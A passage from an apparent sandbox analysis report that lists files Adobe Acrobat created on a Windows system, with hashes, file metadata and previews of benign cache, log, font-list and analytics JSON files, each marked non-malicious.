                    SHA-512:A16A378F2AD84DB0B63E8D5BD75933DF2C689178121D31C2A0DD19D4F85471D1AAF13600232B0A86BF7BA9FA9C8B1EFD677E7707572450F0C71214C6B5D1C663
                    Malicious:false
                    Preview:2024/07/02-06:47:26.786 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/02-06:47:26.788 1da0 Recovering log #3.2024/07/02-06:47:26.789 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):338
                    Entropy (8bit):5.179901915938386
                    Encrypted:false
                    SSDEEP:6:BOABAq2PCHhJ2nKuAl9Ombzo2jMGIFUt84OAimZmw+4OA6/kwOCHhJ2nKuAl9OmT:EAKvBHAa8uFUt81Aim/+1A6/56HAa8RJ
                    MD5:86E9E93D59D4CDBE591FA91D764A0264
                    SHA1:26F4316DFB67848C3BD3EADAE42EF56BDE401A75
                    SHA-256:AB51C6FFCD10064D28E05DA9BAC79D445AE5F80151252EC85C84434FC2949B8E
                    SHA-512:A16A378F2AD84DB0B63E8D5BD75933DF2C689178121D31C2A0DD19D4F85471D1AAF13600232B0A86BF7BA9FA9C8B1EFD677E7707572450F0C71214C6B5D1C663
                    Malicious:false
                    Preview:2024/07/02-06:47:26.786 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/02-06:47:26.788 1da0 Recovering log #3.2024/07/02-06:47:26.789 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):475
                    Entropy (8bit):4.976083759057505
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqs5ChsBdOg2HdZcaq3QYiub6P7E4T3y:Y2sRdskydMHS3QYhbS7nby
                    MD5:3A6252E618FA24407CDEBE8118134E98
                    SHA1:DEB889916FFD91D6B1DC72062480F23FA882B38A
                    SHA-256:7F0F3DDFA854C7A893C311ABF5D23EF072829BD1EDCE5B4B2EC378887DD94018
                    SHA-512:03F4AF33735CE65530AC3C2B4A95966C0FEA22607F6955E35D35B0AA2A7A75FC256BE754B094A4346EA13F5F96BE714CDC5A7D58A6A7E2CFC80EDED71A8166B4
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364477259320906","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144956},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ae838c87-e22f-4a7f-b0cf-d5a4f1b0b085.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:modified
                    Size (bytes):475
                    Entropy (8bit):4.976083759057505
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqs5ChsBdOg2HdZcaq3QYiub6P7E4T3y:Y2sRdskydMHS3QYhbS7nby
                    MD5:3A6252E618FA24407CDEBE8118134E98
                    SHA1:DEB889916FFD91D6B1DC72062480F23FA882B38A
                    SHA-256:7F0F3DDFA854C7A893C311ABF5D23EF072829BD1EDCE5B4B2EC378887DD94018
                    SHA-512:03F4AF33735CE65530AC3C2B4A95966C0FEA22607F6955E35D35B0AA2A7A75FC256BE754B094A4346EA13F5F96BE714CDC5A7D58A6A7E2CFC80EDED71A8166B4
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364477259320906","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144956},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3878
                    Entropy (8bit):5.233646783549896
                    Encrypted:false
                    SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bWteEDEq:S43C4mS7fFi0KFYDjr3LWO3V3aw+bWUY
                    MD5:22D3287FA6ECD677CAA340102909E7DB
                    SHA1:0262B7A985AAB20420B565737F37297D03E0E876
                    SHA-256:7EA29D48FDD6DD615B2F1BFBD53EA2FBDB8AA69E4D260609821F2FBA23F978F7
                    SHA-512:C85E6982F836F1FDACE7D2FCFE54F60A3684823F7DF19F236A223D64EF0E8160D44F4AAF713C2CD3501915D91441EA9A867C3ECC4A99F8752896AF50F538500E
                    Malicious:false
                    Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):5.210687811998938
                    Encrypted:false
                    SSDEEP:6:BOAnq2PCHhJ2nKuAl9OmbzNMxIFUt84OA3rhZmw+4OA3r7kwOCHhJ2nKuAl9Ombg:EAnvBHAa8jFUt81A3N/+1A3/56HAa84J
                    MD5:9B04F95FBFA27232EBF4BA31A225866A
                    SHA1:2EBD57CB638AB07559B4FDA1C740DAB7A2404AB1
                    SHA-256:1F83DFC555F999D2D116EDF7C4DC138A37C005D17D6419AA0C1BE21FCF56FD3B
                    SHA-512:A9FF4382E767219290B898D1FD1109AEFB7DF8F0BA4AB2CD98A415F23AD210C058F964B2DF148649B0FDF3F6A824D854B1B351DCE48EB6A9A0CAA79226834748
                    Malicious:false
                    Preview:2024/07/02-06:47:26.859 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/02-06:47:26.861 1da0 Recovering log #3.2024/07/02-06:47:26.861 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):5.210687811998938
                    Encrypted:false
                    SSDEEP:6:BOAnq2PCHhJ2nKuAl9OmbzNMxIFUt84OA3rhZmw+4OA3r7kwOCHhJ2nKuAl9Ombg:EAnvBHAa8jFUt81A3N/+1A3/56HAa84J
                    MD5:9B04F95FBFA27232EBF4BA31A225866A
                    SHA1:2EBD57CB638AB07559B4FDA1C740DAB7A2404AB1
                    SHA-256:1F83DFC555F999D2D116EDF7C4DC138A37C005D17D6419AA0C1BE21FCF56FD3B
                    SHA-512:A9FF4382E767219290B898D1FD1109AEFB7DF8F0BA4AB2CD98A415F23AD210C058F964B2DF148649B0FDF3F6A824D854B1B351DCE48EB6A9A0CAA79226834748
                    Malicious:false
                    Preview:2024/07/02-06:47:26.859 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/02-06:47:26.861 1da0 Recovering log #3.2024/07/02-06:47:26.861 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240702104731Z-180.bmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                    Category:dropped
                    Size (bytes):71190
                    Entropy (8bit):1.1158673236880685
                    Encrypted:false
                    SSDEEP:96:3MxKbkIYqEEMMEEEe+EEEEEEJAiV+f1YkD1c:l4Ut1YkBc
                    MD5:5F1C6B6A1ED5670830EE47D67169BF1F
                    SHA1:3E4A6253B3A2AAF5DD27C40BE3A8501649A4818F
                    SHA-256:ED6184EACB792B64DEB1CDAC3506D92E7E14EAFEF9E36D51300B7627F417B97D
                    SHA-512:E962F1A0182D71676175A73E0A6302A93F71F6421772A9D069A2406991D0565E874AF23C7FE53C4B5624571DEEE36FDEC4AEF4C10F7AA67F180BAD857811AD3A
                    Malicious:false
                    Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.026467887142631
                    Encrypted:false
                    SSDEEP:3:kkFklIClfllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7lnklc:kKduxliBAIdQZV7I7kc3
                    MD5:03B489A96548565DE6B4BFBA3CBB8681
                    SHA1:364BBE4D05D8A00E73713A2B1E7BE8311067F331
                    SHA-256:1F1427DD6CCAC9CCA95941A71E33D3393D69D006C7374F9EEE90D698FD2ECDCC
                    SHA-512:D22379557042C58922D8A9F3478E271971E9464BFC3D3BBFDC64920D9F544DBB914B46CD95F48A8C16C273044F8CDFC11E72CD52E0EC24C14DBE813D83CD6CF7
                    Malicious:false
                    Preview:p...... ....`....X<Bm...(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7196

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.329032302632101
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJM3g98kUwPeUkwRe9:YvXKXv9A2vR/ZwHA/GMbLUkee9
                    MD5:87BC35B2CA3B405A4F720A9F1C2C9EB4
                    SHA1:11A99A93A76AB14D9C64041406966E7B686D3ECA
                    SHA-256:548814C67D0DFD19370AB9AF497C1712EB06899131ED01EAB1E8962298AE8BD4
                    SHA-512:AFD9C4E69A92EE5E593F4B4DD5C755CA68C88AC673E373997EF9A88E754C1B757D60BC299446BBA2E7D533147FE7D29BCEFB913D4F55516B54652291C6951916
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.263711019805081
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfBoTfXpnrPeUkwRe9:YvXKXv9A2vR/ZwHA/GWTfXcUkee9
                    MD5:1A94A30E31DAFEE70BA1219E9FA980A7
                    SHA1:16EE39CCFEEC83940B2867109DFD95CF0A75138B
                    SHA-256:CA5E820FED17BE2D3198BE3FC3F82DCF717A4AFF60E0E7E25E00F2636E549EEF
                    SHA-512:051387EC3919F3F9E68FB90E759FEFB327F32A092C8A7217518EE6803FD3CA014A31E72F4A038FD8B7213BB75F21B87335164E0F78CCFB536A3D18B571A77145
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.24297881371975
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfBD2G6UpnrPeUkwRe9:YvXKXv9A2vR/ZwHA/GR22cUkee9
                    MD5:39E91972C2A81690ECA76AC338093289
                    SHA1:9AB3F55984CEA3C06EE54E4B1C46F2CD4E580596
                    SHA-256:810A0B03A031D5D063D9331C77C449815D906CBCF7B8D5D0659A3AB7A877B49C
                    SHA-512:F3296D483649D5034F39D41C561BC62FFDBEB4AA2C4D169248011D4FD95EF884D5E48EA5CE87A1B50B13759B1B57EEDE91160F359ACD73FF8611C91FCCFE8679
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):285
                    Entropy (8bit):5.30477624974985
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfPmwrPeUkwRe9:YvXKXv9A2vR/ZwHA/GH56Ukee9
                    MD5:CEAF99FC94957AD76FAC917912B3DA67
                    SHA1:146F5926C9514F7F995336476B314B0A3BE51CC8
                    SHA-256:56B7C84A9A87012B75211B4BAC4EE6DB9C30527626987786871CECCC9AFB64B1
                    SHA-512:F36E6AC17A2C8655EB471A7D73CEA21E9252005A51E27AD63CB8227BAB6F78C0AF3A5ED10BE454D02A46A0F054445CFD1DF52960B3F348A6AA33375EC111E0B0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.268828784276886
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfJWCtMdPeUkwRe9:YvXKXv9A2vR/ZwHA/GBS8Ukee9
                    MD5:373DACEA1153065057C750E320BDF643
                    SHA1:B81F36408F7721F088C09EDCC2BEF2AB68BF5C37
                    SHA-256:4ED9815107443190471E69675BDC646047B2D4B8E63F12B209C8A5F882533559
                    SHA-512:4CBA36F840921FB14FDC733A04FDDF78FE65C0F523AAE68D9972CE9C058F93572006119CEF431771FCBDCCBEE8A3918B459131BC27B29C0A562F4D25906891D1
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.254518085911634
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJf8dPeUkwRe9:YvXKXv9A2vR/ZwHA/GU8Ukee9
                    MD5:FB1F775E6CEB0310F66E8B0E6F486031
                    SHA1:B9919B2398E84FC9CE063C9F46DBB4FC2C39698E
                    SHA-256:70F837F1FAC8F92781EF9C2157CB4D5426C80E1A5DE1B42F5EA848DCEF4622AB
                    SHA-512:59713D772C1C2E1246555024D6A78250CFC9DDD8CDE9EBF0769A5270BE1C99A6DA4DF93092C3EA7018E807471643180572E70D6B107DA0A76CE063F5CA99CFF0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.25338970676377
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfQ1rPeUkwRe9:YvXKXv9A2vR/ZwHA/GY16Ukee9
                    MD5:5FCC0E37342C548A0731B66B6AEB77F4
                    SHA1:F1A240B1D75C58F15D9A738138FA512C20BCBB32
                    SHA-256:64E4047217099828C0471ECFC7511FE36FB1675A75601832552EDFC401167660
                    SHA-512:7D32A880B6FE98B47D7ED0DD887D174F9BAF5953BF82F9030C9BF28BA89CF8745F1943D4925E22C2E9949648DCFC5BE452091A03F3E21C3397F103D7C6AE3CEE
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.270752136735678
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfFldPeUkwRe9:YvXKXv9A2vR/ZwHA/Gz8Ukee9
                    MD5:6D12C7396CD667FD70C9B13173686911
                    SHA1:88E16FED742D20823ACF49764B619DBE14A1289D
                    SHA-256:994D6C11EDFE49287630A72E944535EF0738223ADD80D76FA81CED85622DDDE7
                    SHA-512:E6A3FEB33F2A4987E54FE95395D0902FBD86D3CFAD61169CE3CD55581A06C3B4F6CDC71E15182DCC300AF8BF1E92AD409C6BEBD6659E8A44A4E4E9048222695C
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1372
                    Entropy (8bit):5.736747961605946
                    Encrypted:false
                    SSDEEP:24:Yv6Xv9PJhrKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNX:YvK9PJhrEgigrNt0wSJn+ns8cvFJR
                    MD5:801AD9213407B48661310ECC53E665E5
                    SHA1:A616170F2C7BE63D56AF7FEFB8FCF4D512E8584F
                    SHA-256:98527EE379B993447772CE069EDB6DE51B8EB2CCF19EF73A8DAEDD46D76AFE8F
